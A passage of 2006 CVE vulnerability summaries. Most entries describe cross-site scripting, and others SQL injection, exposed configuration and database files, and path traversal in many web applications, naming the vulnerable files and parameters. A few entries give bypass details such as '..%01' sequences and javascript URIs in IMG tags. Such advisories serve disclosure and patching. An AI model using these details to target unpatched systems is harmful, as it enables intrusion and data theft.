[CVE-2006-3612] Cross-site scripting (XSS) vulnerability in Phorum 5.1.14 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-3609] Cross-site scripting (XSS) vulnerability in index.php in Orbitcoders OrbitMATRIX 1.0 allows remote attackers to inject arbitrary web script or HTML via the page_name parameter with an IMG tag containing a javascript URI in the SRC attribute. [CVE-2006-3607] Multiple cross-site scripting (XSS) vulnerabilities in Softbiz Banner Exchange Script (aka Banner Exchange Network Script) 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the city parameter in (a) insertmember.php, and (2) a PHPSESSID cookie in (b) lostpassword.php, (c) gen_confirm_mem.php, and (d) index.php. [CVE-2006-3603] Cross-site scripting (XSS) vulnerability in index.php in FlexWATCH Network Camera 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the URL. [CVE-2006-3601] UNVERIFIABLE Unspecified vulnerability in an unspecified DNN Modules module for DotNetNuke (.net nuke) allows remote attackers to gain privileges via unspecified vectors, as used in an attack against the Microsoft France web site. NOTE: due to the lack of details and uncertainty about which product is affected, this claim is not independently verifiable. [CVE-2006-3595] The default configuration of IOS HTTP server in Cisco Router Web Setup (CRWS) before 3.3.0 build 31 does not require credentials, which allows remote attackers to access the server with arbitrary privilege levels, aka bug CSCsa78190. [CVE-2006-3593] The command line interface (CLI) in Cisco Unified CallManager (CUCM) 5.0(1) through 5.0(3a) allows local users to overwrite arbitrary files by redirecting a command's output to a file or folder, aka bug CSCse31704. [CVE-2006-3592] Unspecified vulnerability in the command line interface (CLI) in Cisco Unified CallManager (CUCM) 5.0(1) through 5.0(3a) allows local users to execute arbitrary commands with elevated privileges via unspecified vectors, involving "certain CLI commands," aka bug CSCse11005. [CVE-2006-3585] Multiple cross-site scripting (XSS) vulnerabilities in Jetbox CMS 2.1 SR1 allow remote attackers to inject arbitrary web script or HTML via the (1) login parameter in admin/cms/index.php, (2) unspecified parameters in the "Supply news" page in formmail.php, (3) the URL in the "Site statistics" page, and the (5) query_string parameter when performing a search. [CVE-2006-3583] Session fixation vulnerability in Jetbox CMS 2.1 SR1 allows remote attackers to hijack web sessions via a crafted link and the administrator section. [CVE-2006-3579] Cross-site scripting (XSS) vulnerability in Fujitsu ServerView 2.50 up to 3.60L98 and 4.10L11 up to 4.11L81 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-3574] Multiple cross-site scripting (XSS) vulnerabilities in Hitachi Groupmax Collaboration Portal and Web Client before 07-20-/D, and uCosminexus Collaboration Portal and Forum/File Sharing before 06-20-/C, allow remote attackers to "execute malicious scripts" via unknown vectors (aka HS06-014-01). [CVE-2006-3571] Multiple cross-site scripting (XSS) vulnerabilities in interna/hilfe.php in Papoo 3 RC3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) titel or (2) ausgabe parameters. [CVE-2006-3570] Cross-site scripting (XSS) vulnerability in the webform module in Drupal 4.6 before July 8, 2006 and 4.7 before July 8, 2006 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-3568] Multiple cross-site scripting (XSS) vulnerabilities in guestbook.php in Fantastic Guestbook 2.0.1, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via the (1) first_name, (2) last_name, or (3) nickname parameters. [CVE-2006-3564] Multiple cross-site scripting (XSS) vulnerabilities in HiveMail 1.3 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the email, (2) cond, or (3) name parameters to (a) addressbook.view.php, (4) the daysprune parameter to (b) index.php, (5) the data[to] parameter to (c) compose.email.php, and (6) the markas parameter to (d) read.markas.php. [CVE-2006-3563] Cross-site scripting (XSS) vulnerability in gallery/thumb.php in Winged Gallery 1.0 allows remote attackers to inject arbitrary web script or HTML via the image parameter. [CVE-2006-3558] Multiple cross-site scripting (XSS) vulnerabilities in Arif Supriyanto auraCMS 1.62 allow remote attackers to inject arbitrary web script or HTML via (1) the judul_artikel parameter in teman.php and (2) the title of an article sent to admin, which is displayed when unauthenticated users visit index.php. [CVE-2006-3557] MT Orumcek Toplist 2.2 stores DB/orumcektoplist.mdb under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request. [CVE-2006-3555] Multiple cross-site scripting (XSS) vulnerabilities in submit.php in PHP-Fusion before 6.01.3 allow remote attackers to inject arbitrary web script or HTML by using edit_profile.php to upload a (1) avatar or (2) forum image attachment that has a .gif or .jpg extension, and begins with a GIF header followed by JavaScript code, which is executed by Internet Explorer. [CVE-2006-3550] Multiple cross-site scripting (XSS) vulnerabilities in F5 Networks FirePass 4100 5.x allow remote attackers to inject arbitrary web script or HTML via unspecified "writable form fields and hidden fields," including "authentication frontends." [CVE-2006-3549] services/go.php in Horde Application Framework 3.0.0 through 3.0.10 and 3.1.0 through 3.1.1 does not properly restrict its image proxy capability, which allows remote attackers to perform "Web tunneling" attacks and use the server as a proxy via (1) http, (2) https, and (3) ftp URL in the url parameter, which is requested from the server. [CVE-2006-3548] Multiple cross-site scripting (XSS) vulnerabilities in Horde Application Framework 3.0.0 through 3.0.10 and 3.1.0 through 3.1.1 allow remote attackers to inject arbitrary web script or HTML via a (1) javascript URI or an external (2) http, (3) https, or (4) ftp URI in the url parameter in services/go.php (aka the dereferrer), (5) a javascript URI in the module parameter in services/help (aka the help viewer), and (6) the name parameter in services/problem.php (aka the problem reporting screen). [CVE-2006-3545] DISPUTED Microsoft Internet Explorer 7.0 Beta allows remote attackers to cause a denial of service (application crash) via a web page with multiple empty APPLET start tags. NOTE: a third party has disputed this issue, stating that the crash does not occur with Microsoft Internet Explorer 7.0 Beta3. [CVE-2006-3542] Multiple cross-site scripting (XSS) vulnerabilities in Garry Glendown Shopping Cart 0.9 allow remote attackers to inject arbitrary web script or HTML via the (1) shop name field in (a) editshop.php, (b) edititem.php, and (c) index.php [CVE-2006-3539] Multiple cross-site scripting (XSS) vulnerabilities in DKScript.com Dragon's Kingdom Script 1.0 allow remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element in the (1) Subject and (2) Message fields in a do=write (aka Send Mail Message) action in gamemail.php [CVE-2006-3538] Multiple cross-site scripting (XSS) vulnerabilities in demo.php in BeatificFaith Eprayer Alpha allow remote attackers to inject arbitrary web script or HTML via the SRC attribute of a SCRIPT element in the (1) "Your name" field and (2) "Enter Prayer Request here" field. [CVE-2006-3533] Multiple cross-site scripting (XSS) vulnerabilities in Pivot 1.30 RC2 and earlier, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) fg, (2) line1, (3) line2, (4) bg, (5) c1, (6) c2, (7) c3, and (8) c4 parameters in (a) includes/blogroll.php [CVE-2006-3526] Multiple cross-site scripting (XSS) vulnerabilities in guestbook.php in Sport-slo Advanced Guestbook 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) name and (2) form parameters. [CVE-2006-3523] Clearswift MIMEsweeper for Web before 5.1.15 Hotfix allows remote attackers to cause a denial of service (crash) via an encrypted archived .RAR file, which triggers a scan error and causes the Web Policy Engine service to terminate. [CVE-2006-3522] Cross-site scripting (XSS) vulnerability in Clearswift MIMEsweeper for Web before 5.1.15 Hotfix allows remote attackers to inject arbitrary web script or HTML via the URL, which is reflected back in an error message when trying to access a blocked web site. [CVE-2006-3521] Multiple cross-site scripting (XSS) vulnerabilities in index/siteforge-bugs-action/proj.siteforge in SiteForge Collaborative Development Platform 1.0.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) _status, (2) _extra1, (3) _extra2, or (4) _extra3 parameters. [CVE-2006-3519] Multiple cross-site scripting (XSS) vulnerabilities in The Banner Engine (tbe) 4.0 allow remote attackers to execute arbitrary web script or HTML via the (1) text parameter in a search action to (a) top.php, and the (2) adminpass or (3) adminlogin parameter to (b) signup.php. [CVE-2006-3518] SQL injection vulnerability in SayfalaAltList.asp in Webvizyon Portal 2006 allows remote attackers to execute arbitrary SQL commands via the ID parameter. [CVE-2006-3514] Multiple cross-site scripting (XSS) vulnerabilities in admin/actions.php in PHP-Blogger 2.2.5, and possibly earlier versions, allow remote attackers to execute arbitrary web script or HTML via the (1) name, (2) title, (3) news, (4) description, and (5) sitename parameters. [CVE-2006-3505] WebKit in Apple Mac OS X 10.3.9 and 10.4.7 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted HTML document that causes WebKit to access an object that has already been deallocated. [CVE-2006-3494] Multiple cross-site scripting (XSS) vulnerabilities in Buddy Zone 1.0.1 allow remote attackers to inject arbitrary HTML and web script via the (1) cat_id parameter to (a) view_classifieds.php [CVE-2006-3487] VirtuaStore 2.0 stores sensitive files under the web root with insufficient access control, which allows remote attackers to obtain local database information by directly accessing database/virtuastore.mdb. [CVE-2006-3484] Multiple cross-site scripting (XSS) vulnerabilities in ATutor before 1.5.3 allow remote attackers to inject arbitrary web script or HTML via the (1) show_courses or (2) current_cat parameters to (a) admin/create_course.php, show_courses parameter to (b) users/create_course.php, (3) p parameter to (c) documentation/admin/, (4) forgot parameter to (d) password_reminder.php, (5) cat parameter to (e) users/browse.php, or the (6) submit parameter to admin/fix_content.php. [CVE-2006-3483] PHPMailList 1.8.0 stores sensitive information under the web document root iwth insufficient access control, which allows remote attackers to obtain email addresses of subscribers, configuration information, and the admin username and password via direct requests to (1) list.dat or (2) ml_config.dat. [CVE-2006-3482] Cross-site scripting (XSS) vulnerability in maillist.php in PHPMailList 1.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the email parameter. [CVE-2006-3481] Multiple SQL injection vulnerabilities in Joomla! before 1.0.10 allow remote attackers to execute arbitrary SQL commands via unspecified parameters involving the (1) "Remember Me" function, (2) "Related Items" module, and the (3) "Weblinks submission". [CVE-2006-3480] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.0.10 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters involving the (1) getUserStateFromRequest function, and the (2) SEF and (3) com_messages modules. [CVE-2006-3476] Cross-site scripting (XSS) vulnerability in comments.php in PhpWebGallery 1.5.2 and earlier, and possibly 1.6.0, allows remote attackers to inject arbitrary web script or HTML via the keyword parameter. [CVE-2006-3456] The Symantec NAVOPTS.DLL ActiveX control (aka Symantec.Norton.AntiVirus.NAVOptions) 12.2.0.13, as used in Norton AntiVirus, Internet Security, and System Works 2005 and 2006, is designed for use only in application-embedded web browsers, which allows remote attackers to "crash the control" via unspecified vectors related to content on a web site, and place Internet Explorer into a "defunct state" in which remote attackers can execute arbitrary code in addition to other Symantec ActiveX controls, regardless of whether they are marked safe for scripting. NOTE: this CVE was inadvertently used for an E-mail Auto-Protect issue, but that issue has been assigned CVE-2007-3771. [CVE-2006-3436] Cross-site scripting (XSS) vulnerability in Microsoft .NET Framework 2.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving "ASP.NET controls that set the AutoPostBack property to true". [CVE-2006-3429] Cross-site scripting (XSS) vulnerability in TigerTom TTCalc 1.0 allows remote attackers to inject arbitrary web script or HTML via the currency parameter in (1) loan.php and (2) mortgage.php. NOTE: the provenance of this information is unknown [CVE-2006-3428] Cross-site scripting (XSS) vulnerability in TigerTom TTCalc 1.0 allows remote attackers to inject arbitrary web script or HTML via the year parameter in (1) loan.php and (2) mortgage.php. [CVE-2006-3424] Multiple buffer overflows in WebEx Downloader ActiveX Control, possibly in versions before November 2005, allow remote attackers to execute arbitrary code via unspecified vectors. [CVE-2006-3423] WebEx Downloader ActiveX Control and WebEx Downloader Java before 2.1.0.0 do not validate downloaded components, which allows remote attackers to execute arbitrary code via a website that activates the GpcUrlRoot and GpcIniFileName ActiveX controls to cause the client to download a DLL file. [CVE-2006-3405] Cross-site scripting (XSS) vulnerability in qtofm.php in QTOFileManager 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) delete, (2) pathext, and (3) edit parameters. [CVE-2006-3397] Multiple cross-site scripting (XSS) vulnerabilities in Taskjitsu before 2.0.1 allow remote attackers to inject arbitrary web script or HTML via multiple unspecified parameters, including the (1) title and (2) description parameters when creating a task. [CVE-2006-3392] Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files, as demonstrated using "..%01" sequences, which bypass the removal of "../" sequences before bytes such as "%01" are removed from the filename. NOTE: This is a different issue than CVE-2006-3274. [CVE-2006-3388] Cross-site scripting (XSS) vulnerability in phpMyAdmin before 2.8.2 allows remote attackers to inject arbitrary web script or HTML via the table parameter. [CVE-2006-3385] Cross-site scripting (XSS) vulnerability in divers.php in Vincent Leclercq News 5.2 allows remote attackers to inject arbitrary web script or HTML via the (1) id and (2) disabled parameters. [CVE-2006-3383] Cross-site scripting (XSS) vulnerability in index.php in mAds 1.0 allows remote attackers to inject arbitrary web script or HTML via Javascript events such as onmouseover within a URL. NOTE: the provenance of this information is unknown [CVE-2006-3382] Cross-site scripting (XSS) vulnerability in search.php in mAds 1.0 allows remote attackers to inject arbitrary web script or HTML via the "search string". [CVE-2006-3377] Cross-site scripting (XSS) vulnerability in JMB Software AutoRank PHP 3.02 and earlier, and AutoRank Pro 5.01 and earlier, allows remote attackers to inject arbitrary web script or HTML via the (1) Keyword parameter in search.php and the (2) Username parameter in main.cgi. [CVE-2006-3371] Eupla Foros 1.0 stores the inc/config.inc file under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information, including the database configuration. [CVE-2006-3370] Blueboy 1.0.3 stores bb_news_config.inc under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information, including the database configuration. [CVE-2006-3369] Kamikaze-QSCM 0.1 stores config.inc under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information, including the database configuration. [CVE-2006-3368] Efone 20000723 stores config.inc under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information. [CVE-2006-3367] Mp3 JudeBox Server (Mp3NetBox) Beta 1 stores config.inc under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information, including the database configuration. [CVE-2006-3366] Multiple cross-site scripting (XSS) vulnerabilities in V3 Chat allow remote attackers to inject arbitrary web script or HTML via crafted HTML tags, as demonstrated by the IMG tag, in the (1) id parameter in (a) mail/index.php and (b) mail/reply.php [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip. [CVE-2006-3359] Multiple SQL injection vulnerabilities in index.php in NewsPHP 2006 PRO allow remote attackers to inject arbitrary web script or HTML via the (1) words, (2) id, (3) topmenuitem, and (4) cat_id parameters in (a) index.php [CVE-2006-3358] Multiple cross-site scripting (XSS) vulnerabilities in index.php in NewsPHP 2006 PRO allow remote attackers to inject arbitrary web script or HTML via the (1) words, (2) id, (3) cat_id, and (4) tim parameters, which are not sanitized before being returned in an error page. NOTE: it is possible that some of these vectors are resultant from an SQL injection issue. [CVE-2006-3353] Opera 9 allows remote attackers to cause a denial of service (crash) via a crafted web page that triggers an out-of-bounds memory access, related to an iframe and JavaScript that accesses certain style sheets properties. [CVE-2006-3345] Cross-site scripting (XSS) vulnerability in AliPAGER, possibly 1.5 and earlier, allows remote attackers to inject arbitrary web script or HTML via a chat line. [CVE-2006-3342] Cross-site scripting (XSS) vulnerability in index.php in Arctic 1.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the query parameter in a search cmd. [CVE-2006-3338] Cross-site scripting (XSS) vulnerability in Atlassian JIRA 3.6.2-#156 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in a direct request to secure/ConfigureReleaseNote.jspa, which are not sanitized before being returned in an error page. [CVE-2006-3337] Cross-site scripting (XSS) vulnerability in frontend/x/files/select.html in cPanel 10.8.2-CURRENT 118 and earlier allows remote attackers to inject arbitrary web script or HTML via the file parameter. [CVE-2006-3333] Cross-site scripting (XSS) vulnerability in index.php in Zorum Forum 3.5 allows remote attackers to inject web script or HTML via the multiple unspecified parameters, including the (1) frommethod, (2) list, and (3) method, which are reflected in an error message. NOTE: some of these vectors might be resultant from SQL injection. [CVE-2006-3331] Opera before 9.0 does not reset the SSL security bar after displaying a download dialog from an SSL-enabled website, which allows remote attackers to spoof a trusted SSL certificate from an untrusted website and facilitates phishing attacks. [CVE-2006-3327] Cross-site scripting (XSS) vulnerability in Custom dating biz dating script 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) sn20_special_cases parameter ("Special Cases" field) in profile/mini.php, (2) tyxx01_album_name parameter ("Album Name" field) in profile/photo_create.php, and the (3) u parameter in admin/user_view.php. [CVE-2006-3321] Multiple cross-site scripting (XSS) vulnerabilities in openforum.asp in OpenForum 1.2 Beta and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) ofdisp and (2) ofmsgid parameters. [CVE-2006-3320] Cross-site scripting (XSS) vulnerability in command.php in SiteBar 3.3.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the command parameter. [CVE-2006-3319] Cross-site scripting (XSS) vulnerability in rss/index.php in PHP iCalendar 2.22 and earlier allows remote attackers to inject arbitrary web script or HTML via the cal parameter. [CVE-2006-3313] Cross-site scripting (XSS) vulnerability in search.jsp in Netsoft smartNet 2.0 allows remote attackers to inject arbitrary web script or HTML via the keyWord parameter. [CVE-2006-3312] Multiple cross-site scripting (XSS) vulnerabilities in ashmans and Bill Echlin QaTraq 6.5 RC and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) link_print, (2) link_upgrade, (3) link_sql, (4) link_next, (5) link_prev, and (6) link_list parameters in top.inc as included by queries_view_search.php [CVE-2006-3306] Cross-site scripting (XSS) vulnerability in the preparestring funtion in lib/common.php in Project EROS bbsengine before 20060501-0142-jam, and possibly earlier versions dating back to 2006-02-23, might allow remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2006-3305] Multiple cross-site scripting (XSS) vulnerabilities in UebiMiau Webmail 2.7.10, and 2.7.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) f_user parameter in index.php, the (2) pag parameter in messages.php, or the (3) lid, (4) tid, and (5) sid parameters in error.php. [CVE-2006-3303] Multiple cross-site scripting (XSS) vulnerabilities in pm.php in DeluxeBB 1.07 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) subject or (2) to parameters. [CVE-2006-3301] Multiple cross-site scripting (XSS) vulnerabilities in phpQLAdmin 2.2.7 and earlier allow remote attackers to inject arbitrary web script or HTML via the domain parameter in (1) user_add.php or (2) unit_add.php. [CVE-2006-3299] Cross-site scripting (XSS) vulnerability in index.php in Usenet Script 0.5 allows remote attackers to inject arbitrary web script or HTML via the group parameter. [CVE-2006-3297] Cross-site scripting (XSS) vulnerability in error.php in UebiMiau Webmail 2.7.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the icq parameter. NOTE: the provenance of this information is unknown [CVE-2006-3295] Cross-site scripting (XSS) vulnerability in header.php in Open Guestbook 0.5 allows remote attackers to inject arbitrary web script or HTML via the title parameter. [CVE-2006-3290] HTTP server in Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(51) stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain usernames and directory paths via a direct URL request. [CVE-2006-3284] Cross-site scripting (XSS) vulnerability in Dating Agent PRO 4.7.1 allows remote attackers to inject arbitrary web script or HTML via the login parameter in (1) webmaster/index.php and (2) search.php. [CVE-2006-3279] Cross-site scripting (XSS) vulnerability in aeDating 4.1 allows remote attackers to inject arbitrary web script or HTML via the (1) Sex parameter in index.php, (2) ProfileType parameter in join_form.php, and (3) Email parameter in forgot.php. [CVE-2006-3278] Cross-site scripting (XSS) vulnerability in H-Sphere 2.5.1 Beta 1 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) next_template, (2) start, (3) curr_menu_id, and (4) arid parameters in psoft/servlet/resadmin/psoft.hsphere.CP when using the mailman/massmail.html template_name. [CVE-2006-3274] Directory traversal vulnerability in Webmin before 1.280, when run on Windows, allows remote attackers to read arbitrary files via \ (backslash) characters in the URL to certain directories under the web root, such as the image directory. [CVE-2006-3273] Cross-site scripting (XSS) vulnerability in menu.php in Some Chess 1.5 rc1 allows remote attackers to inject arbitrary web script or HTML via the user parameter ("New Name" field). [CVE-2006-3265] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Qdig before 1.2.9.3, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) pre_gallery or (2) post_gallery parameters. [CVE-2006-3264] Cross-site scripting (XSS) vulnerability in mclient.cgi in Namo DeepSearch 4.5 allows remote attackers to inject arbitrary web script or HTML via the p parameter. [CVE-2006-3263] SQL injection vulnerability in the Weblinks module (weblinks.php) in Mambo 4.6rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the catid parameter. [CVE-2006-3262] SQL injection vulnerability in the Weblinks module (weblinks.php) in Mambo 4.6rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the title parameter. [CVE-2006-3261] Cross-site scripting (XSS) vulnerability in Trend Micro Control Manager (TMCM) 3.5 allows remote attackers to inject arbitrary web script or HTML via the username field on the login page, which is not properly sanitized before being displayed in the error log. [CVE-2006-3260] Cross-site scripting (XSS) vulnerability in index.php in vlbook 1.02 allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2006-3259] Multiple cross-site scripting (XSS) vulnerabilities in e107 0.7.5 allow remote attackers to inject arbitrary web script or HTML via the (1) ep parameter to search.php and the (2) subject parameter in comment.php (aka the Subject field when posting a comment). [CVE-2006-3258] Multiple cross-site scripting (XSS) vulnerabilities in index.html in BNBT TrinEdit and EasyTracker 7.7r3.2004.10.27 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) filter or (2) sort parameters. [CVE-2006-3257] Multiple cross-site scripting (XSS) vulnerabilities in Claroline 1.7.7 allow remote attackers to inject arbitrary HTML or web script via unspecified attack vectors, possibly including (1) calendar/myagenda.php, (2) document/document.php, (3) phpbb/newtopic.php, (4) tracking/userLog.php, and (5) wiki/page.php. [CVE-2006-3253] DISPUTED Cross-site scripting (XSS) vulnerability in member.php in vBulletin 3.5.x allows remote attackers to inject arbitrary web script or HTML via the u parameter. NOTE: the vendor has disputed this report, stating that they have been unable to replicate the issue and that "the userid parameter is run through our filtering system as an unsigned integer." [CVE-2006-3247] Multiple cross-site scripting (XSS) vulnerabilities in show.php in GL-SH Deaf Forum 6.4.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) search, (2) page, and (3) action parameters. NOTE: the provenance of this information is unknown [CVE-2006-3246] Cross-site scripting (XSS) vulnerability in show.php in GL-SH Deaf Forum 6.4.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the sort parameter. [CVE-2006-3245] Multiple cross-site scripting (XSS) vulnerabilities in activatemember in mvnForum 1.0 GA and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) member and (2) activatecode parameters. [CVE-2006-3241] Cross-site scripting (XSS) vulnerability in messages.php in XennoBB 1.0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the tid parameter. [CVE-2006-3240] Cross-site scripting (XSS) vulnerability in classes/ui.class.php in dotProject 2.0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the login parameter. [CVE-2006-3237] Cross-site scripting (XSS) vulnerability in index.php in Enterprise Groupware System (EGS) 1.2.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the module parameter. [CVE-2006-3235] Multiple cross-site scripting (XSS) vulnerabilities in index.php in FineShop 3.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) promocja, (2) wysw, or (3) id_produc parameters. [CVE-2006-3233] Cross-site scripting (XSS) vulnerability in openwebmail-read.pl in Open WebMail (OWM) 2.52, and other versions released before 06/18/2006, allows remote attackers to inject arbitrary web script or HTML via the from field. NOTE: some third party sources have mentioned the "to" and "from" fields, although CVE analysis shows that these are associated with the previous version, a different executable, and a different CVE. [CVE-2006-3232] Unspecified vulnerability in IBM WebSphere Application Server before 6.0.2.11 has unknown impact and attack vectors because the "UserNameToken cache was improperly used." [CVE-2006-3231] Unspecified vulnerability in IBM WebSphere Application Server (WAS) before 6.0.2.11, when fileServingEnabled is true, allows remote attackers to obtain JSP source code and other sensitive information via "URIs with special characters." [CVE-2006-3230] Cross-site scripting (XSS) vulnerability in index.tmpl in Azureus Tracker 2.4.0.2 and earlier (Java BitTorrent Client Tracker) allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2006-3229] Cross-site scripting (XSS) vulnerability in Open WebMail (OWM) 2.52, and other versions released before 05/12/2006, allows remote attackers to inject arbitrary web script or HTML via the (1) To and (2) From fields in openwebmail-main.pl, and possibly (3) other unspecified vectors related to "openwebmailerror calls that need to display HTML." [CVE-2006-3227] Interpretation conflict between Internet Explorer and other web browsers such as Mozilla, Opera, and Firefox might allow remote attackers to modify the visual presentation of web pages and possibly bypass protection mechanisms such as content filters via ASCII characters with the 8th bit set, which could be stripped by Internet Explorer to render legible text, but not when using other browsers. NOTE: there has been significant discussion about this issue, and as of 20060625, it is not clear where the responsibility for this issue lies, although it might be due to vagueness within the associated standards. NOTE: this might only be exploitable with certain encodings. [CVE-2006-3225] Cross-site scripting (XSS) vulnerability in Sun ONE Application Server 7 before Update 9, Java System Application Server 7 2004Q2 before Update 5, and Java System Application Server Enterprise Edition 8.1 2005 Q1 allows remote attackers to inject arbitrary HTML or web script via unknown vectors. [CVE-2006-3213] SQL injection vulnerability in WeBBoA Hosting 1.1 allows remote attackers to execute arbitrary SQL commands via the id parameter to an unspecified script, possibly host/yeni_host.asp. [CVE-2006-3212] Cross-site scripting (XSS) vulnerability in sign.php in cjGuestbook 1.3 and earlier allows remote attackers to inject web script or HTML via the (1) name, (2) email, (3) add, and (4) wName parameters. NOTE: the provenance of this information is unknown [CVE-2006-3197] Cross-site scripting (XSS) vulnerability in Invision Power Board (IPB) 2.1.6 and earlier allows remote attackers to inject arbitrary web script or HTML via a POST that contains hexadecimal-encoded HTML. [CVE-2006-3195] Cross-site scripting (XSS) vulnerability in index.php in singapore 0.10.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the template parameter. [CVE-2006-3191] Cross-site scripting (XSS) vulnerability in comment.php in MPCS 0.2 allows remote attackers to inject arbitrary web script or HTML via the pageid parameter. [CVE-2006-3189] Cross-site scripting (XSS) vulnerability in administration/tblcontent/login1.php in HotPlug CMS 1.0 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2006-3187] Multiple cross-site scripting (XSS) vulnerabilities in Sharky e-shop 3.05 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) maingroup and (2) secondgroup parameters to (a) search_prod_list.asp, and the (3) maingroup parameter to (b) meny2.asp. NOTE: it is possible that this is resultant from SQL injection or a forced SQL error. [CVE-2006-3186] Multiple cross-site scripting (XSS) vulnerabilities in CMS Faethon 1.3.2 allow remote attackers to inject arbitrary web script or HTML via the mainpath parameter to (1) data/footer.php and (2) admin/header.php. NOTE: the provenance of this information is unknown [CVE-2006-3183] Cross-site scripting (XSS) vulnerability in index.php in MobeScripts Mobile Space Community 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) browse parameter, which is not filtered in the resulting error message, and multiple unspecified input fields, including those involved when (2) updating a profile, (3) posting comments or entries in a blog, (4) uploading files, (5) picture captions, and (6) sending a private message (PM). [CVE-2006-3180] Cross-site scripting (XSS) vulnerability in ftp_index.php in Confixx Pro 3.0 allows remote attackers to inject arbitrary web script or HTML via the path parameter. [CVE-2006-3179] Cross-site scripting (XSS) vulnerability in tools_ftp_pwaendern.php in Confixx Pro 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the account parameter. [CVE-2006-3169] Multiple cross-site scripting (XSS) vulnerabilities in CS-Forum 0.81 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) msg_result and (2) rep_titre parameters in (a) read.php [CVE-2006-3166] Cross-site scripting (XSS) vulnerability in propview.php in Free Realty 2.9-0.6 and earlier allows remote attackers to execute arbitrary web script or HTML via the sort parameter. [CVE-2006-3160] Cross-site scripting (XSS) vulnerability in fm.php in ONEdotOH Simple File Manager (SFM) 0.24a and earlier allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2006-3157] Cross-site scripting (XSS) vulnerability in index.php in Thinkfactory UltimateGoogle 1.00 and earlier allows remote attackers to inject arbitrary web script or HTML via the REQ parameter. [CVE-2006-3156] Cross-site scripting (XSS) vulnerability in index.cgi in Ultimate eShop 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the subid parameter. [CVE-2006-3155] Multiple cross-site scripting (XSS) vulnerabilities in Ultimate Auction 1.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) item parameter in (a) emailtofriend.pl or (b) violation.pl, (2) seller parameter in (c) vsoa.pl, (3) user parameter in (d) userask.pl or (e) leavefeed.pl, (4) itemnum parameter in userask.pl, (5) category parameter in (f) itemlist.pl, and the (6) query parameter in (g) search.pl. [CVE-2006-3153] Cross-site scripting (XSS) vulnerability in index.pl in Ultimate Estate 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the cat parameter. [CVE-2006-3151] Cross-site scripting (XSS) vulnerability in index.php in AssoCIateD (aka ACID) 1.2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the menu parameter. [CVE-2006-3149] Cross-site scripting (XSS) vulnerability in topic.php in phpMyForum 4.1.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the highlight parameter. [CVE-2006-3143] Cross-site scripting (XSS) vulnerability in icue_login.asp in Maximus SchoolMAX 4.0.1 and earlier iCue and iParent applications allows remote attackers to inject arbitrary web script or HTML via the error_msg parameter. [CVE-2006-3141] Cross-site scripting (XSS) vulnerability in details.cfm in Tradingeye Shop R4 and earlier allows remote attackers to inject arbitrary web script or 